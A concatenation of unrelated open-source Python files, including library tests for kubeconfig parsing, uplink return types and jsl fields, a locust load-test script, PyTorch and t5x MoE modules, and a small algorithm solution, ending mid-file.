tests/test_0220-contiguous-byte-ranges-in-http.py | eic/uproot4 | 133 | 12745007 | # BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import numpy
import pytest
import uproot
@pytest.mark.network
def test():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/RD_distribution.root:tree"
) as f:
whole_branch = f["vchi2_b"].array(library="np")
assert whole_branch[0] == 5.234916687011719
assert whole_branch[-1] == 12.466843605041504
whole_branch = f["mu_pt_sum"].array(library="np")
assert whole_branch[0] == 26.4675350189209
assert whole_branch[-1] == 39.84319305419922
|
testhub/testsuites/qip/test_datasets.py | banrieen/PerfBoard | 146 | 12745026 | <gh_stars>100-1000
""" 测试单(场景)
松山湖AI制造业推理平台性能测试SLI/SLO
1. 通过HTTP接口推送原始数据集和推理脚本(具体数量、频次待定)
2. 平台将数据写入nfs/ceph、数据库的读写性能测试(以及IOPS)
3. 100批量数据标注、图像预览响应测试
4. 数据集、模型的增删改查的接口响应(暂定32x6个模型、数据集)
5. 模型转换测试(暂定32x6个模型、数据集)
6. 数据集转换测试(暂定32x6个模型、数据集)
7. 10x32x6个分布式推理任务调度的稳定性
8. 64mpbs,128Mbps图片流量的负载测试
9. 测试(客户)环境rabbitmq的吞吐量和响应延时
10. 1000次/s的HTTP推理请求失败率
11. 1000次/s的HTTP推理结果请求失败率(上传到平台数据库)
12. 1/1000不良率的告警响应测试
13. master节点在模型转换、数据集转换时IO,CPU,MEM的使用率
14. master、A3010在满载推理业务时的网络负载,IO,CPU,MEM占用率
# ScriptType:performance test
# UpdateDate: 2021.03-4
# Matainer: thomas
# Env: Win10 64bit, python3.8
"""
from locust import HttpUser, TaskSet, task, between
from locust.contrib.fasthttp import FastHttpUser
from locust import events
from locust.clients import HttpSession
import logging
import json
import os
import yaml
import pdb
import hashlib
from testhub.testlib import fake_users
from testhub.testlib import csv_client
TEST_CONF = os.path.join(os.path.abspath(os.path.dirname(os.path.abspath(__file__)) + os.path.sep ), "datas.yaml")
TEST_DATAS = {}
DATA_PREFIX = "songshanhu"
USER_CREDENTIALS = []
def read_test_datas(conf_file=TEST_CONF):
stream = {}
with open(conf_file,'r') as cf:
stream =cf.read()
conf = yaml.safe_load(stream)
return conf
@events.quitting.add_listener
def _(environment, **kw):
if environment.stats.total.fail_ratio > 0.001:
logging.error("Test failed due to failure ratio > 1%")
environment.process_exit_code = 1
elif environment.stats.total.avg_response_time > 5000:
logging.error("Test failed due to average response time ratio > 200 ms")
environment.process_exit_code = 2
elif environment.stats.total.get_response_time_percentile(0.99) > 2000:
logging.error("Test failed due to 95th percentile response time > 800 ms")
environment.process_exit_code = 3
else:
environment.process_exit_code = 0
class Datasets(TaskSet):
""" testsuite
1. 通过HTTP接口推送原始数据集和推理脚本(具体数量、频次待定)
2. 平台将数据写入nfs/ceph、数据库的读写性能测试(以及IOPS)
4. 数据集、模型的增删改查的接口响应(暂定32x6个模型、数据集)
5. 模型转换测试(暂定32x6个模型、数据集)
6. 数据集转换测试(暂定32x6个模型、数据集)
13. master节点在模型转换、数据集转换时IO,CPU,MEM的使用率
14. master、A3010在满载推理业务时的网络负载,IO,CPU,MEM占用率
"""
global TEST_DATAS
datasets_session = {}
def on_start(self):
print("======================= A new test is starting, user will login {} ! =======================".format(TEST_DATAS["ENV"]["HOST"]))
self.client.request("get",TEST_DATAS["RESTFULAPI"]["homepage"])
self.client.header = TEST_DATAS["RESTFULAPI"]["header"]
aaccount = USER_CREDENTIALS.pop()
response = self.client.request("post", url=TEST_DATAS["RESTFULAPI"]["login"]["path"], data=data)
result = response.json()
# pdb.set_trace()
try:
if result["success"]:
TEST_DATAS["ACCOUNT"]["token"] = result["token"]
TEST_DATAS["ACCOUNT"]["currentRole_id"] = result["currentRole"][0]["id"]
TEST_DATAS["RESTFULAPI"]["header"]["Authorization"] = "Bearer " + TEST_DATAS["ACCOUNT"]["token"]
TEST_DATAS["RESTFULAPI"]["cookie"] = response.cookies
except KeyError:
response.raise_for_status()
def on_stop(self):
print("======================= A test is ending, user will logout {} ! =======================".format(TEST_DATAS["ENV"]["HOST"]))
response = self.client.request("get", url=TEST_DATAS["RESTFULAPI"]["logout"]["path"])
@task(1)
def test_create_dataset(self):
""" testcases
1. 注册新用户组
"""
datasets_info = fake_users.new_datastes_songshanhu()
with self.client.request("post",url=TEST_DATAS["RESTFULAPI"]["create_group"]["path"],
headers=TEST_DATAS["RESTFULAPI"]["header"],
json=datasets_info) as resp:
self.datasets_session["datasets_id"] = resp["data"]["id"]
self.datasets_session["datasetCode"] = resp["data"]["datasetCode"]
@task(0)
def test_upload_datas(self):
""" testcases
2. 上传压缩包
"""
self.datasets_session["datasets_id"] = resp["data"]["id"]
self.datasets_session["datasetCode"] = resp["data"]["datasetCode"]
with self.client.request("post",url=TEST_DATAS["RESTFULAPI"]["create_group"]["path"],
headers=TEST_DATAS["RESTFULAPI"]["header"],
json=datasets_info) as resp:
self.datasets_session["datasets_uploaded_path"] = resp["data"]
class BasicalDatas(HttpUser):
global TEST_DATAS
global USER_CREDENTIALS
sock = None
wait_time = between(0.5, 2)
TEST_DATAS = read_test_datas(conf_file=TEST_CONF)
USER_CREDENTIALS = [{'userName': ic['userName'], 'password':ic['password'] } for ic in csv_client.csv_reader_as_json(csv_path=TEST_DATAS["ACCOUNT"]["CSV_PATH"]) if "userName" != ic['userName'] ]
host = TEST_DATAS["ENV"]["HOST"]
tasks = [Datasets]
if __name__ == "__main__":
# global DATA_PREFIX
DATA_PREFIX = "songshanhu"
pass
# locust -f testhub/testsuites/songshanhu/test_datasets.py --conf testhub/testsuites/songshanhu/host.conf
|
egg/core/continous_communication.py | vengalraoguttha/EGG | 254 | 12745030 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Callable, Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from egg.core.interaction import LoggingStrategy
class ContinuousLinearSender(nn.Module):
def __init__(
self,
agent: nn.Module,
encoder_input_size: int,
encoder_hidden_size: int = 64,
num_layers: int = 1,
activation: str = "relu",
):
super(ContinuousLinearSender, self).__init__()
self.agent = agent
activations = {
"relu": F.relu,
"tanh": F.tanh,
"leaky_relu": F.leaky_relu,
"identity": nn.Identity(),
}
self.activation = activations[activation.lower()]
encoder_hidden_sizes = [encoder_hidden_size] * num_layers
encoder_layer_dimensions = [(encoder_input_size, encoder_hidden_sizes[0])]
for i, hidden_size in enumerate(encoder_hidden_sizes[1:]):
hidden_shape = (self.encoder_hidden_sizes[i], hidden_size)
encoder_layer_dimensions.append(hidden_shape)
self.encoder_hidden_layers = nn.ModuleList(
[nn.Linear(*dimensions) for dimensions in encoder_layer_dimensions]
)
def forward(self, x, aux_input=None):
x = self.agent(x, aux_input)
for hidden_layer in self.encoder_hidden_layers[:-1]:
x = self.activation(hidden_layer(x))
sender_output = self.encoder_hidden_layers[-1](x)
return sender_output
class ContinuousLinearReceiver(nn.Module):
def __init__(
self,
agent: nn.Module,
):
super(ContinuousLinearReceiver, self).__init__()
self.agent = agent
def forward(self, message, input=None, aux_input=None):
agent_output = self.agent(message, input, aux_input)
return agent_output
class SenderReceiverContinuousCommunication(nn.Module):
def __init__(
self,
sender: nn.Module,
receiver: nn.Module,
loss: Callable,
train_logging_strategy: Optional[LoggingStrategy] = None,
test_logging_strategy: Optional[LoggingStrategy] = None,
):
"""
:param sender: Sender agent. sender.forward() has to output a continouos vector
:param receiver: Receiver agent. receiver.forward() has to accept two parameters:
message and receiver_input.
`message` is shaped as (batch_size, vocab_size).
:param loss: Callable that outputs differentiable loss, takes the following parameters:
* sender_input: input to Sender (comes from dataset)
* message: message sent from Sender
* receiver_input: input to Receiver from dataset
* receiver_output: output of Receiver
* labels: labels that come from dataset
:param train_logging_strategy, test_logging_strategy: specify what parts of interactions to persist for
later analysis in the callbacks.
"""
super(SenderReceiverContinuousCommunication, self).__init__()
self.sender = sender
self.receiver = receiver
self.loss = loss
self.train_logging_strategy = (
LoggingStrategy()
if train_logging_strategy is None
else train_logging_strategy
)
self.test_logging_strategy = (
LoggingStrategy()
if test_logging_strategy is None
else test_logging_strategy
)
def forward(self, sender_input, labels, receiver_input=None, aux_input=None):
message = self.sender(sender_input, aux_input)
receiver_output = self.receiver(message, receiver_input, aux_input)
loss, aux_info = self.loss(
sender_input, message, receiver_input, receiver_output, labels, aux_input
)
logging_strategy = (
self.train_logging_strategy if self.training else self.test_logging_strategy
)
interaction = logging_strategy.filtered_interaction(
sender_input=sender_input,
receiver_input=receiver_input,
labels=labels,
aux_input=aux_input,
receiver_output=receiver_output,
message=message.detach(),
message_length=torch.ones(message[0].size(0)),
aux=aux_info,
)
return loss.mean(), interaction
|
kivy/core/video/video_null.py | Galland/kivy | 13,889 | 12745062 |
'''
VideoNull: empty implementation of VideoBase for the no provider case
'''
from kivy.core.video import VideoBase
class VideoNull(VideoBase):
'''VideoBase implementation when there is no provider.
'''
pass
|
tests/test_iter_methods.py | mail6543210/jsl | 237 | 12745084 | <reponame>mail6543210/jsl<filename>tests/test_iter_methods.py<gh_stars>100-1000
# coding: utf-8
from jsl import (StringField, ArrayField, Var, DictField,
NotField, Document, DocumentField)
from jsl.fields.compound import BaseOfField
a = StringField()
b = StringField()
c = StringField()
d = StringField()
e = StringField()
f = StringField()
g = StringField()
h = StringField()
j = StringField()
def test_array_field():
field = ArrayField(Var({
'role_1': a,
'role_2': b,
'role_none': None,
}), additional_items=Var({
'role_3': c,
'role_4': d,
'role_1': e,
'role_none': None,
}))
assert set(field.iter_fields()) == set([a, b, c, d, e])
assert set(field.resolve_and_iter_fields('role_1')) == set([a, e])
assert set(field.resolve_and_iter_fields('role_3')) == set([c])
assert set(field.resolve_and_iter_fields('role_none')) == set([])
field = ArrayField(Var({
'role_1': (a, b),
'role_2': c
}), additional_items=d)
assert set(field.iter_fields()) == set([a, b, c, d])
field = ArrayField((Var({'role_1': a, 'role_2': b, 'role_none': None}), c))
assert set(field.iter_fields()) == set([a, b, c])
assert set(field.resolve_and_iter_fields('role_1')) == set([a, c])
assert set(field.resolve_and_iter_fields('role_none')) == set([c])
field = ArrayField(a, additional_items=b)
assert set(field.iter_fields()) == set([a, b])
assert set(field.resolve_and_iter_fields('some_role')) == set([a, b])
field = ArrayField()
assert set(field.iter_fields()) == set([])
def test_dict_field():
field = DictField(properties=Var({
'role_1': {
'a': Var({
'role_a': a,
'role_none': None,
}),
'b': b,
'role_none': None,
},
'role_2': {'c': c},
'role_none': None,
}), pattern_properties=Var({
'role_3': {
'x*': Var({
'role_b': d,
'role_none': None,
}),
},
'role_4': {'y*': e},
'role_none': None,
}), additional_properties=Var({
'role_5': f,
'role_6': g,
'role_none': None,
}))
assert set(field.iter_fields()) == set([a, b, c, d, e, f, g])
field = DictField(
properties={'a': a},
pattern_properties={'b': b},
additional_properties=c
)
assert set(field.iter_fields()) == set([a, b, c])
field = DictField()
assert set(field.iter_fields()) == set([])
def test_base_of_field():
field = BaseOfField((a, b))
assert set(field.iter_fields()) == set([a, b])
field = BaseOfField(Var({
'role_1': (a, b),
'role_2': c,
'role_3': None, # probably should raise?
}))
assert set(field.iter_fields()) == set([a, b, c])
def test_not_field():
field = NotField(a)
assert set(field.iter_fields()) == set([a])
assert set(field.resolve_and_iter_fields('some_role')) == set([a])
field = NotField(Var({
'role_1': a,
'role_2': b,
'role_3': None, # probably should raise?
}))
assert set(field.iter_fields()) == set([a, b])
assert set(field.resolve_and_iter_fields('role_1')) == set([a])
assert set(field.resolve_and_iter_fields('role_3')) == set([])
def test_document_field():
class A(Document):
a = a
b = b
field = DocumentField(A)
assert set(field.iter_fields()) == set([a, b])
class B(Document):
field = Var({
'a': a,
'b': b
})
b = c
field = DocumentField(B)
assert set(field.iter_fields()) == set([a, b, c])
class C(Document):
pass
field = DocumentField(C)
assert set(field.iter_fields()) == set([])
|
examples/research/surgery/nds/filter_resnexta_group1.py | Harald-R/aw_nas | 195 | 12745085 | <gh_stars>100-1000
import os
import sys
import yaml
import pickle
from aw_nas import germ
from aw_nas.weights_manager.base import BaseWeightsManager
from aw_nas.common import rollout_from_genotype_str
ss = germ.GermSearchSpace()
wm = BaseWeightsManager.get_class_("germ")(
ss, "cuda", rollout_type="germ",
germ_supernet_type="nds_resnexta",
germ_supernet_cfg={
"num_classes": 10,
"stem_type": "res_stem_cifar",
"group_search": True
}
)
arch_file = sys.argv[1]
gt_file = sys.argv[2]
# ---- parse arch file ----
with open(arch_file, "r") as r_f:
archs = yaml.load(r_f)
nogroup_archs = []
for arch in archs:
rollout = rollout_from_genotype_str(arch, ss)
if all(rollout['num_groups.{}'.format(i)] == 1 for i in range(3)):
# all `num_groups` == 1
[rollout.arch.pop("num_groups.{}".format(i)) for i in range(3)]
nogroup_archs.append(rollout.genotype)
out_arch_fname = os.path.join(os.path.dirname(arch_file), "nogroup_{}".format(os.path.basename(arch_file)))
print("Dumped {} archs to {}".format(len(nogroup_archs), out_arch_fname))
with open(out_arch_fname, "w") as w_f:
yaml.dump(nogroup_archs, w_f)
# ---- parse gt pickle file ----
with open(gt_file, "rb") as r_f:
gt = pickle.load(r_f)
nogroup_gts = []
for arch, param, flops, acc in zip(*gt):
rollout = rollout_from_genotype_str(arch, ss)
if all(rollout['num_groups.{}'.format(i)] == 1 for i in range(3)):
# all `num_groups` == 1
[rollout.arch.pop("num_groups.{}".format(i)) for i in range(3)]
nogroup_gts.append([rollout.genotype, param, flops, acc])
nogroup_gts = list(zip(*nogroup_gts))
out_gt_fname = os.path.join(os.path.dirname(gt_file), "nogroup_{}".format(os.path.basename(gt_file)))
with open(out_gt_fname, "wb") as w_f:
pickle.dump(nogroup_gts, w_f)
print("Dumped {} gt entries to {}".format(len(nogroup_gts[0]), out_gt_fname))
|
tests/authentication/test_login_kubeconfig.py | tavaresrodrigo/kopf | 855 | 12745111 | <gh_stars>100-1000
import os
import pytest
import yaml
from kopf._cogs.structs.credentials import LoginError
from kopf._core.intents.piggybacking import has_kubeconfig, login_with_kubeconfig
MINICONFIG = '''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
clusters:
- name: clstr
users:
- name: usr
'''
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_has_no_kubeconfig_when_nothing_is_provided(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is False
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{'KUBECONFIG': 'x'}], ids=['set'])
def test_has_kubeconfig_when_envvar_is_set_but_no_homedir(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is True
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_has_kubeconfig_when_homedir_exists_but_no_envvar(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=True)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is True
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_homedir_is_used_if_it_exists(tmpdir, mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=True)
open_mock = mocker.patch('kopf._core.intents.piggybacking.open')
open_mock.return_value.__enter__.return_value.read.return_value = MINICONFIG
mocker.patch.dict(os.environ, envs, clear=True)
credentials = login_with_kubeconfig()
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert open_mock.call_count == 1
assert open_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert credentials is not None
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_homedir_is_ignored_if_it_is_absent(tmpdir, mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
open_mock = mocker.patch('kopf._core.intents.piggybacking.open')
open_mock.return_value.__enter__.return_value.read.return_value = ''
mocker.patch.dict(os.environ, envs, clear=True)
credentials = login_with_kubeconfig()
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert open_mock.call_count == 0
assert credentials is None
def test_absent_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(IOError):
login_with_kubeconfig()
def test_corrupted_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write("""!!acb!.-//:""") # invalid yaml
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(yaml.YAMLError):
login_with_kubeconfig()
def test_empty_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(LoginError) as err:
login_with_kubeconfig()
assert "context is not set" in str(err.value)
def test_mini_kubeconfig_reading(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write(MINICONFIG)
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.server is None
assert credentials.insecure is None
assert credentials.scheme is None
assert credentials.token is None
assert credentials.certificate_path is None
assert credentials.certificate_data is None
assert credentials.private_key_path is None
assert credentials.private_key_data is None
assert credentials.ca_path is None
assert credentials.ca_data is None
assert credentials.password is None
assert credentials.username is None
assert credentials.default_namespace is None
def test_full_kubeconfig_reading(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
- name: def
clusters:
- name: clstr
cluster:
server: https://hostname:1234/
certificate-authority-data: base64dataA
certificate-authority: /pathA
insecure-skip-tls-verify: true
- name: hij
users:
- name: usr
user:
username: uname
password: <PASSWORD>
client-certificate-data: base64dataC
client-certificate: /pathC
client-key-data: base64dataK
client-key: /pathK
token: tkn
- name: klm
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.server == 'https://hostname:1234/'
assert credentials.insecure == True
assert credentials.scheme is None
assert credentials.token == '<PASSWORD>'
assert credentials.certificate_path == '/pathC'
assert credentials.certificate_data == 'base64dataC'
assert credentials.private_key_path == '/pathK'
assert credentials.private_key_data == 'base64dataK'
assert credentials.ca_path == '/pathA'
assert credentials.ca_data == 'base64dataA'
assert credentials.password == '<PASSWORD>'
assert credentials.username == 'uname'
assert credentials.default_namespace == 'ns'
def test_kubeconfig_with_provider_token(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
clusters:
- name: clstr
users:
- name: usr
user:
auth-provider:
config:
access-token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_across_currentcontext(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
clusters:
- name: clstr
cluster:
server: srv
users:
- name: usr
user:
token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns'
assert credentials.server == 'srv'
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_across_contexts(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
clusters:
- name: clstr
cluster:
server: srv
users:
- name: usr
user:
token: tkn
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns'
assert credentials.server == 'srv'
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_first_wins(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns1
clusters:
- name: clstr
cluster:
server: srv1
users:
- name: usr
user:
token: <PASSWORD>
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns2
clusters:
- name: clstr
cluster:
server: srv2
users:
- name: usr
user:
token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns1'
assert credentials.server == 'srv1'
assert credentials.token == '<PASSWORD>'
|
src/0264.ugly-number-ii/ugly-number-ii.py | lyphui/Just-Code | 782 | 12745125 | class Solution:
def nthUglyNumber(self, n):
ugly = [1]
i2 = i3 = i5 = 0
while len(ugly) < n:
while ugly[i2] * 2 <= ugly[-1]: i2 += 1
while ugly[i3] * 3 <= ugly[-1]: i3 += 1
while ugly[i5] * 5 <= ugly[-1]: i5 += 1
ugly.append(min(ugly[i2] * 2, ugly[i3] * 3, ugly[i5] * 5))
return ugly[-1] |
tests/unit/test_returns.py | lust4life/uplink | 918 | 12745148 | <reponame>lust4life/uplink
# Local imports
from uplink import returns
def test_returns(request_builder):
custom = returns(str)
request_builder.get_converter.return_value = str
request_builder.return_type = returns.ReturnType.with_decorator(
None, custom
)
custom.modify_request(request_builder)
assert request_builder.return_type(2) == "2"
def test_returns_with_multiple_decorators(request_builder, mocker):
decorator1 = returns(str)
decorator2 = returns.json()
request_builder.get_converter.return_value = str
first_type = returns.ReturnType.with_decorator(None, decorator1)
second_type = (
request_builder.return_type
) = returns.ReturnType.with_decorator(
first_type, decorator2
)
# Verify that the return type doesn't change after being handled by first decorator
decorator1.modify_request(request_builder)
assert request_builder.return_type is second_type
# Verify that the second decorator does handle the return type
mock_response = mocker.Mock()
mock_response.json.return_value = {"key": "value"}
decorator2.modify_request(request_builder)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
def test_returns_json(request_builder, mocker):
mock_response = mocker.Mock()
mock_response.json.return_value = {"key": "value"}
request_builder.get_converter.return_value = str
returns_json = returns.json(str, ())
request_builder.return_type = returns.ReturnType.with_decorator(
None, returns_json
)
returns_json.modify_request(request_builder)
assert isinstance(request_builder.return_type, returns.ReturnType)
assert callable(request_builder.return_type)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
# Verify: Idempotent
returns_json.modify_request(request_builder)
assert isinstance(request_builder.return_type, returns.ReturnType)
assert callable(request_builder.return_type)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
# Verify: Doesn't apply to unsupported types
request_builder.get_converter.return_value = None
returns_json = returns.json(str, ())
request_builder.return_type = returns.ReturnType.with_decorator(
None, returns_json
)
returns_json.modify_request(request_builder)
assert not callable(request_builder.return_type)
def test_returns_JsonStrategy(mocker):
response = mocker.Mock(spec=["json"])
response.json.return_value = {"hello": "world"}
converter = returns.JsonStrategy(lambda x: x, "hello")
assert converter(response) == "world"
converter = returns.JsonStrategy(lambda y: y + "!", "hello")
assert converter(response) == "world!"
assert returns.JsonStrategy(1).unwrap() == 1
|
descarteslabs/common/graft/client/__init__.py | descarteslabs/descarteslabs-python | 167 | 12745179 | from .client import (
is_delayed,
is_function_graft,
value_graft,
keyref_graft,
apply_graft,
function_graft,
merge_value_grafts,
guid,
isolate_keys,
parametrize,
consistent_guid,
)
__all__ = [
"is_delayed",
"is_function_graft",
"value_graft",
"keyref_graft",
"apply_graft",
"function_graft",
"merge_value_grafts",
"guid",
"isolate_keys",
"parametrize",
"consistent_guid",
]
|
t5x/contrib/moe/partitioning_test.py | google-research/t5x | 278 | 12745188 | <gh_stars>100-1000
# Copyright 2022 The T5X Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for partitioning."""
from typing import Any
from absl.testing import absltest
from flax import core as flax_core
from flax import optim
from flax.linen import partitioning as flax_partitioning
import jax
import numpy as np
from t5x import train_state as train_state_lib
from t5x.contrib.moe import partitioning as moe_partitioning
from t5x.contrib.moe import training_utils
mock = absltest.mock
AxisMetadata = flax_partitioning.AxisMetadata
DataLayout = moe_partitioning.DataLayout
FlaxOptimTrainState = train_state_lib.FlaxOptimTrainState
InferenceState = train_state_lib.InferenceState
PartitionSpec = moe_partitioning.PartitionSpec
PRNGKey = Any
class LogicalAdam(optim.Adam):
"""Subclass of Adam optimizer with T5X logical axis partitioning support."""
def derive_logical_axes(self, optimizer_state, param_logical_axes):
"""Derives optimizer logical partitioning from model logical partitions."""
del param_logical_axes # Return fixed axes for test
optimizer_logical_axes = {
'state': {
'param_states': {
'logits_dense': {
'grad_ema': None,
'grad_sq_ema': None
},
'mlp': {
'wo': {
'kernel': {
'grad_ema': PartitionSpec('embed', 'mlp'),
'grad_sq_ema': None
}
}
}
},
'step': None
},
'target': {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp'),
},
},
}
}
return optimizer_state.restore_state(optimizer_logical_axes)
def create_optimizer():
"""Creates simple Adam optimizer."""
target = {
'logits_dense': np.ones((16, 16), np.float32),
'mlp': {
'wo': {
'kernel': np.ones((32, 16), np.float32)
}
}
}
return LogicalAdam(learning_rate=1e-4).create(target)
class PartitioningTest(absltest.TestCase):
def test_default_data_layout(self):
# No expert replication required. Use default data layout.
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
self.assertFalse(partitioner.two_data_axes)
self.assertEqual(
partitioner.get_data_layout(batch_size=32),
DataLayout(
batch_size=32,
shard_id=0,
num_shards=1,
is_first_host_in_replica_set=True))
def test_two_data_axis_layout_override(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
# Force override case to check layout is valid.
partitioner.two_data_axes = True
partitioner._data_axis = ('data', 'model')
self.assertEqual(
partitioner.get_data_layout(batch_size=8),
DataLayout(
batch_size=8,
shard_id=0,
num_shards=1,
is_first_host_in_replica_set=True))
def test_logical_axes_for_moe_partitioner_no_overrides(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8,
num_partitions=1,
state_filter_fn=training_utils.match_fn(r'no_state_matching'))
optimizer = create_optimizer()
train_state = FlaxOptimTrainState(
optimizer,
params_axes={
'logits_dense_axes': AxisMetadata(names=('vocab', 'embed')),
'mlp': {
'wo': {
'kernel_axes': AxisMetadata(names=('embed', 'mlp'))
}
}
})
logical_axes = partitioner.get_logical_axes(train_state)
# No updates to state. Should match what derive_logical_axes() returns.
jax.tree_map(self.assertIsNone, logical_axes.param_states['logits_dense'])
self.assertEqual(logical_axes.param_states['mlp']['wo']['kernel'].grad_ema,
PartitionSpec('embed', 'mlp'))
self.assertIsNone(
logical_axes.param_states['mlp']['wo']['kernel'].grad_sq_ema)
self.assertEqual(
logical_axes.params, {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp')
}
}
})
def test_logical_axes_for_moe_partitioner_with_overrides(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8,
num_partitions=1,
state_filter_fn=training_utils.match_fn(r'.*mlp.*'))
optimizer = create_optimizer()
train_state = FlaxOptimTrainState(
optimizer,
params_axes={
'logits_dense_axes': AxisMetadata(names=('vocab', 'embed')),
'mlp': {
'wo': {
'kernel_axes': AxisMetadata(names=('embed', 'mlp'))
}
}
})
logical_axes = partitioner.get_logical_axes(train_state)
jax.tree_map(self.assertIsNone, logical_axes.param_states['logits_dense'])
# 'mlp' params should be prepended with 'expert' spec because
# state_filter_fn matches '.*mlp.*'.
self.assertEqual(logical_axes.param_states['mlp']['wo']['kernel'].grad_ema,
PartitionSpec('expert', 'embed', 'mlp'))
self.assertEqual(
logical_axes.param_states['mlp']['wo']['kernel'].grad_sq_ema,
PartitionSpec('expert',))
self.assertEqual(
logical_axes.params, {
'logits_dense': PartitionSpec('vocab', 'embed'),
'mlp': {
'wo': {
'kernel': PartitionSpec('embed', 'mlp')
}
}
})
def test_inference_state_logical_axes(self):
partitioner = moe_partitioning.MoePjitPartitioner(
num_experts=8, num_partitions=1)
model_variables = flax_core.freeze({
'params': {
'dense': {
'bias': np.zeros(4),
'kernel': np.zeros((2, 4))
}
},
'params_axes': {
